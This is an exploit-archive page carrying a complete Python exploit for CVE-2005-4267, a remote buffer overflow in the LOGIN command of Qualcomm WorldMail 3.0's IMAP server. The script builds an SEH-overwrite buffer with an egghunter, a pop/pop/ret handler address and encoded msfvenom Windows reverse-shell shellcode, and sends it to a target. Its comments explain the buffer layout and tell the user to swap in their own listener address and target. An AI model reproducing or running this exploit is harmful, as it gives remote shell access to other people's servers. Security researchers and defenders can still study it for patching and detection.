Qualcomm WorldMail 3.0 - 'IMAPd' Remote Buffer Overflow in LOGIN command
CVE
Category
Price
Severity
CVE-2005-4267
CWE-119
Unknown
High
Author
Risk
Exploitation Type
Date
Cesar Cerrudo
High
Remote
2020-06-13
CPE
cpe:/a:qualcomm:worldmail:3.0.039:imapd
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020060053 Below is a copy:
# Exploit Title: Qualcomm WorldMail 3.0 - 'IMAPd' Remote Buffer Overflow in LOGIN command
# Buffer overflow in Qualcomm WorldMail 3.0 and earlier allows remote attackers to execute arbitrary code via a long run of "}" characters in the LOGIN command. This script is an SEH overwrite: an egghunter stage and a Windows reverse-shell stage (msfvenom windows/shell_reverse_tcp) are placed in the LOGIN argument, so the shellcode must be regenerated with your own LHOST/LPORT and the target IP below must be changed before use.
# Exploit Author: Sarang Tumne @SarT
# Date: 13th June, 2020
# CVE ID: CVE-2005-4267
# Confirmed on release 3.0. The SEH handler address (0x600db2e7, pop/pop/ret) is specific to the build the author tested and must be re-found for any other version.
# Vendor: https://www.qualcomm.com/
###############################################
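import socket
import sys
import time  # unused, kept so the module's import surface matches the original listing

# Target defaults from the original listing. Override on the command line:
#     python3 exploit.py <host> [port]
TARGET_HOST = "192.168.56.112"
TARGET_PORT = 143
# The original recv() blocked forever when the service died without closing the
# connection, which is the expected outcome once the reverse shell fires.
RECV_TIMEOUT = 10.0

# Stage 1: 32-byte egghunter. Carries the 4-byte tag "w00t"
# (\xb8\x77\x30\x30\x74 = mov eax, "w00t"); decoded from the bytes it scans
# memory via int 0x2e (\xcd\x2e), matches the tag twice (two scasd) and jumps
# to what follows it — confirm in a debugger if in doubt.
EGGHUNTER = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    b"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

# Padding between the egghunter and the SEH record.
SEH_PAD = b"B" * 50

# nSEH: "\xEB\xb6" = jmp short -74, padded with two nops.
# NOTE(review): from the nSEH slot (offset 769 of the overflow buffer) a -74
# jump computes to offset 697, i.e. 10 bytes into EGGHUNTER rather than its
# first byte (687). The original author reports the exploit working on 3.0, so
# confirm the real stack layout in a debugger before adjusting this.
NSEH = b"\xEB\xb6\x90\x90"

# SEH handler: 0x600db2e7, a pop/pop/ret gadget (per the original "#PPR"
# comment). Version-specific: valid for the 3.0 build the author tested;
# re-find it for any other build. Note it contains 0x0d, which the shellcode's
# bad-char list excludes; the author reports it working regardless, so the
# LOGIN parser presumably tolerates a CR inside the argument — verify.
SEH_HANDLER = b"\xe7\xb2\x0d\x60"

# Egg the hunter searches for, followed by a nop sled into the shellcode.
EGG = b"w00tw00t"
NOP_SLED = b"\x90" * 40

# Stage 2: msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f c -b "\x00\x0a\x0d" EXITFUNC=seh -e x86/alpha_mixed
# The LHOST/LPORT baked into this blob are the original author's; regenerate
# it with your own listener address before use.
SHELLCODE = (
    b"\x89\xe1\xdb\xc2\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
    b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
    b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
    b"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    b"\x6b\x4c\x48\x68\x6c\x42\x35\x50\x65\x50\x53\x30\x75\x30\x4c"
    b"\x49\x6a\x45\x46\x51\x39\x50\x55\x34\x6e\x6b\x56\x30\x50\x30"
    b"\x4c\x4b\x50\x52\x66\x6c\x4e\x6b\x32\x72\x76\x74\x4c\x4b\x31"
    b"\x62\x67\x58\x64\x4f\x78\x37\x42\x6a\x51\x36\x75\x61\x59\x6f"
    b"\x6e\x4c\x45\x6c\x65\x31\x53\x4c\x54\x42\x54\x6c\x37\x50\x4f"
    b"\x31\x48\x4f\x34\x4d\x55\x51\x39\x57\x38\x62\x4a\x52\x53\x62"
    b"\x53\x67\x6c\x4b\x56\x32\x72\x30\x4c\x4b\x31\x5a\x77\x4c\x4e"
    b"\x6b\x30\x4c\x67\x61\x34\x38\x4d\x33\x47\x38\x37\x71\x6e\x31"
    b"\x33\x61\x6c\x4b\x73\x69\x61\x30\x56\x61\x69\x43\x4e\x6b\x47"
    b"\x39\x44\x58\x49\x73\x77\x4a\x50\x49\x6c\x4b\x64\x74\x4c\x4b"
    b"\x77\x71\x39\x46\x75\x61\x69\x6f\x6c\x6c\x7a\x61\x68\x4f\x54"
    b"\x4d\x55\x51\x78\x47\x37\x48\x39\x70\x71\x65\x4c\x36\x75\x53"
    b"\x73\x4d\x78\x78\x47\x4b\x33\x4d\x44\x64\x61\x65\x58\x64\x51"
    b"\x48\x4e\x6b\x70\x58\x74\x64\x55\x51\x79\x43\x70\x66\x6c\x4b"
    b"\x64\x4c\x52\x6b\x4c\x4b\x30\x58\x77\x6c\x55\x51\x6b\x63\x6c"
    b"\x4b\x36\x64\x6e\x6b\x36\x61\x68\x50\x4f\x79\x63\x74\x67\x54"
    b"\x61\x34\x51\x4b\x61\x4b\x50\x61\x70\x59\x63\x6a\x36\x31\x79"
    b"\x6f\x59\x70\x63\x6f\x63\x6f\x52\x7a\x6e\x6b\x72\x32\x6a\x4b"
    b"\x6c\x4d\x63\x6d\x43\x58\x74\x73\x47\x42\x67\x70\x37\x70\x72"
    b"\x48\x44\x37\x30\x73\x76\x52\x61\x4f\x33\x64\x55\x38\x42\x6c"
    b"\x53\x47\x56\x46\x37\x77\x4b\x4f\x5a\x75\x68\x38\x6c\x50\x46"
    b"\x61\x35\x50\x57\x70\x56\x49\x39\x54\x32\x74\x46\x30\x43\x58"
    b"\x46\x49\x4f\x70\x32\x4b\x47\x70\x49\x6f\x69\x45\x62\x70\x32"
    b"\x70\x70\x50\x72\x70\x71\x50\x62\x70\x67\x30\x42\x70\x51\x78"
    b"\x5a\x4a\x74\x4f\x39\x4f\x6d\x30\x59\x6f\x69\x45\x4a\x37\x53"
    b"\x5a\x44\x45\x33\x58\x49\x50\x6c\x68\x55\x68\x50\x6c\x52\x48"
    b"\x34\x42\x45\x50\x62\x31\x71\x4c\x6c\x49\x48\x66\x43\x5a\x74"
    b"\x50\x61\x46\x52\x77\x61\x78\x6c\x59\x4c\x65\x33\x44\x51\x71"
    b"\x49\x6f\x48\x55\x4e\x65\x49\x50\x71\x64\x76\x6c\x4b\x4f\x32"
    b"\x6e\x45\x58\x54\x35\x78\x6c\x70\x68\x6c\x30\x38\x35\x59\x32"
    b"\x61\x46\x6b\x4f\x79\x45\x72\x48\x52\x43\x42\x4d\x32\x44\x55"
    b"\x50\x6d\x59\x6a\x43\x42\x77\x32\x77\x32\x77\x75\x61\x48\x76"
    b"\x42\x4a\x72\x32\x42\x79\x73\x66\x68\x62\x49\x6d\x35\x36\x4a"
    b"\x67\x31\x54\x77\x54\x75\x6c\x46\x61\x37\x71\x4c\x4d\x53\x74"
    b"\x47\x54\x56\x70\x38\x46\x35\x50\x57\x34\x63\x64\x56\x30\x51"
    b"\x46\x53\x66\x42\x76\x77\x36\x36\x36\x30\x4e\x46\x36\x51\x46"
    b"\x51\x43\x51\x46\x45\x38\x62\x59\x78\x4c\x75\x6f\x4e\x66\x79"
    b"\x6f\x4b\x65\x4c\x49\x49\x70\x30\x4e\x76\x36\x62\x66\x6b\x4f"
    b"\x74\x70\x42\x48\x63\x38\x4e\x67\x47\x6d\x63\x50\x79\x6f\x4e"
    b"\x35\x6f\x4b\x49\x6e\x56\x6e\x54\x72\x48\x6a\x72\x48\x49\x36"
    b"\x6e\x75\x4d\x6d\x4d\x6d\x39\x6f\x4e\x35\x75\x6c\x63\x36\x63"
    b"\x4c\x46\x6a\x6b\x30\x59\x6b\x69\x70\x43\x45\x36\x65\x4d\x6b"
    b"\x51\x57\x52\x33\x64\x32\x72\x4f\x70\x6a\x45\x50\x33\x63\x39"
    b"\x6f\x4a\x75\x41\x41"
)

# The trailing run of "}" is the overflow trigger named in CVE-2005-4267.
JUNK = b"}" * 300


def build_login_overflow() -> bytes:
    """Return the complete IMAP LOGIN line that overflows the WorldMail IMAPd.

    Layout of the overflow buffer (offsets relative to its first byte):
      0    687 x "A"        filler up to the egghunter
      687  EGGHUNTER        32 bytes
      719  SEH_PAD          50 x "B"
      769  NSEH             jmp short -74 + 2 nops
      773  SEH_HANDLER      0x600db2e7 (pop/pop/ret)
      777  EGG + NOP_SLED + SHELLCODE
      then JUNK             300 x "}"

    The line is prefixed with the IMAP tag/command "A001 LOGIN " and
    terminated with CRLF, exactly as the original script sent it.
    """
    overflow = b"".join([
        b"A" * 687,
        EGGHUNTER,
        SEH_PAD,
        NSEH,
        SEH_HANDLER,
        EGG,
        NOP_SLED,
        SHELLCODE,
        JUNK,
    ])
    return b"A001 LOGIN " + overflow + b"\r\n"


def exploit(host: str, port: int, timeout: float = RECV_TIMEOUT) -> bytes:
    """Connect to ``host:port``, send the overflow and return the server's reply.

    Returns b"" when nothing arrives within ``timeout`` seconds — the usual
    outcome when the service crashes or hands control to the shellcode.
    Raises OSError (e.g. ConnectionRefusedError) if the connection fails.
    The socket is always closed, which the original script did not guarantee.
    """
    payload = build_login_overflow()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        # sendall(): the original send() could legally write only part of the buffer.
        sock.sendall(payload)
        try:
            return sock.recv(50000)
        except socket.timeout:
            return b""


def main(argv: list[str]) -> int:
    """CLI entry point: ``exploit.py [host [port]]``; prints the raw reply."""
    host = argv[0] if argv else TARGET_HOST
    port = int(argv[1]) if len(argv) > 1 else TARGET_PORT
    print(exploit(host, port))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv[1:]))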